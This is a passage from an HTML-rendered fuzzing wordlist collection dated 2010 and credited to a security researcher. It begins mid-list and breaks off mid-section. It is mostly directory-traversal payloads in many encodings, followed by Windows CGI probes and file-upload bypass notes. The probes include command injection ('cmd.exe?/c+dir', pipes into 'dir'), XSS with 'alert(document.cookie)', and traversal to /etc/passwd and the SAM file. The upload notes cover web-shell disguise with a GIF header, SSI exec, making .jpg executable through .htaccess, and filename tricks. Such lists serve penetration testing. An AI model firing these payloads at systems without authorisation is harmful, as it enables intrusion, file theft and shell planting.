..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}<br />
0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}<br />
0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}<br />
..0x5c{FILE}<br />
..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}<br />
0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}<br />
0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}<br />
..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}<br />
%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}<br />
%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}<br />
..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}<br />
%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}<br />
%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}<br />
///%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}<br />
\\\%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}<br />
..//{FILE}<br />
..//..//{FILE}<br />
..//..//..//{FILE}<br />
..//..//..//..//{FILE}<br />
..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//{FILE}<br />
..//..//..//..//..//..//..//..//{FILE}<br />
..///{FILE}<br />
..///..///{FILE}<br />
..///..///..///{FILE}<br />
..///..///..///..///{FILE}<br />
..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///{FILE}<br />
..///..///..///..///..///..///..///..///{FILE}<br />
..\\{FILE}<br />
..\\..\\{FILE}<br />
..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}<br />
..\\\{FILE}<br />
..\\\..\\\{FILE}<br />
..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}<br />
./\/./{FILE}<br />
./\/././\/./{FILE}<br />
./\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}<br />
.\/\.\{FILE}<br />
.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}<br />
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}<br />
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}<br />
./../{FILE}<br />
./.././../{FILE}<br />
./.././.././../{FILE}<br />
./.././.././.././../{FILE}<br />
./.././.././.././.././../{FILE}<br />
./.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././../{FILE}<br />
./.././.././.././.././.././.././.././../{FILE}<br />
.\..\{FILE}<br />
.\..\.\..\{FILE}<br />
.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}<br />
.//..//{FILE}<br />
.//..//.//..//{FILE}<br />
.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}<br />
.\\..\\{FILE}<br />
.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}<br />
../{FILE}<br />
../..//{FILE}<br />
../..//../{FILE}<br />
../..//../..//{FILE}<br />
../..//../..//../{FILE}<br />
../..//../..//../..//{FILE}<br />
../..//../..//../..//../{FILE}<br />
../..//../..//../..//../..//{FILE}<br />
..\{FILE}<br />
..\..\\{FILE}<br />
..\..\\..\{FILE}<br />
..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\{FILE}<br />
..\..\\..\..\\..\..\\..\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\{FILE}<br />
..///{FILE}<br />
../..///{FILE}<br />
../..//..///{FILE}<br />
../..//../..///{FILE}<br />
../..//../..//..///{FILE}<br />
../..//../..//../..///{FILE}<br />
../..//../..//../..//..///{FILE}<br />
../..//../..//../..//../..///{FILE}<br />
..\\\{FILE}<br />
..\..\\\{FILE}<br />
..\..\\..\\\{FILE}<br />
..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\\\{FILE}<br />
..\..\\..\..\\..\..\\..\..\\\{FILE}<br />
</pre><br />
<br />
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76) ===<br />
<pre># Common Windows CGI (Update: 17 March 2010)<br />
# fuzz inside executable directories<br />
# on windows, this is usually /scripts or /cgi-bin<br />
# adam.muntner@quietmove.com<br />
<br />
cart32.exe<br />
get32.exe<br />
visadmin.exe<br />
foxweb.exe<br />
webplus.exe?about<br />
fpsrvadm.exe<br />
MsmMask.exe<br />
cmd.exe?/c+dir<br />
cmd1.exe?/c+dir<br />
post32.exe|dir%20c:\\<br />
cgitest.exe<br />
hpnst.exe?c=p+i=<br />
Pbcgi.exe<br />
testcgi.exe<br />
webfind.exe?keywords=01234567890123456789<br />
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C<br />
test-cgi.exe?<script>alert(document.cookie)</script><br />
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['<br />
mkilog.exe<br />
mkplog.exe<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
MsmMask.exe?mask=/junk334<br />
perl.exe?-v<br />
perl.exe<br />
ppdscgi.exe<br />
c32web.exe/ChangeAdminPassword<br />
windmail.exe<br />
dbmlparser.exe<br />
cgimail.exe<br />
minimal.exe<br />
rguest.exe<br />
visitor.exe<br />
webbbs.exe<br />
wguest.exe<br />
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15<br />
cfgwiz.exe<br />
Cgitest.exe<br />
mailform.exe<br />
post16.exe<br />
imagemap.exe<br />
htimage.exe/path/filename?2,2<br />
htimage.exe<br />
Webnews.exe<br />
texis.exe/junk<br />
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/<br />
sensepost.exe?/c+dir<br />
testcgi.exe<br />
testcgi.exe?<script>alert(document.cookie)</script><br />
ion-p.exe?page=c:\winnt\repair\sam<br />
../../../../../../../../../../WINNT/system32/ipconfig.exe<br />
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe<br />
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf <br />
foxweb.dll<br />
wconsole.dll<br />
shtml.dll<br />
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]<br />
rightfax/fuwww.dll/?<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%<br />
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\<br />
GW5/GWWEB.EXE<br />
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA<br />
GW5/GWWEB.EXE?HELP=bad-request<br />
GWWEB.EXE?HELP=bad-request<br />
echo.bat<br />
echo.bat?&dir+c:\\<br />
hello.bat?&dir+c:\\<br />
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
input2.bat?|dir<br />
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
test-cgi.bat<br />
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\<br />
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,<br />
</pre><br />
<br />
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===<br />
<pre># File Upload Fuzzfile - File Name Filter Bypass<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
# For MIME filter bypass, your shellscript should look like<br />
# -------<br />
# GIF89aP;<br />
# [shell]<br />
# -------<br />
#<br />
# For mod_cgi Server Side Include upload attacks<br />
#<br />
#<!--#exec cmd="ls" --><br />
#<br />
#or, on Windows<br />
#<br />
#<!--#exec cmd="dir" --><br />
#<br />
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd; try setting .jpg to executable. If you can set the target directory, try fuzzing the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.<br />
#<br />
# example .htaccess that sets mime type .jpg to be executable:<br />
# -----<br />
# AddType application/x-httpd-php .jpg<br />
# -----<br />
</pre><br />
<br />
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===<br />
<pre># adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# <br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===<br />
<pre># adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# <br />
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar <br />
# PHP on Windows<br />
{PHPSCRIPT}.php::$DATA<br />
</pre><br />
<br />
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===<br />
<pre># adam.muntner@quietmove.com<br />
# released under creative commons license<br />
# <br />
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:<br />
# -----<br />
#<?php phpinfo(); ?> <br />
#-----<br />
{PHPSCRIPT}<br />
{PHPSCRIPT}.phtml<br />
{PHPSCRIPT}.php.html<br />
{PHPSCRIPT}.php::$DATA<br />
{PHPSCRIPT}.php.php.rar <br />
{PHPSCRIPT}.php.rar <br />
</pre><br />
<br />
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2) ===<br />
<pre># Cross-Platform File Upload Filter Bypass Appends (Update: 17 March 2010)<br />
# adam.muntner@quietmove.com<br />
# released under creative commons license<br />
<br />
%00index.html<br />
;index.html<br />
</pre><br />
<br />
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7) ===<br />
<pre># PHP-Specific File Upload Filter Bypass Appends (Update: 17 March 2010 - notes<br />
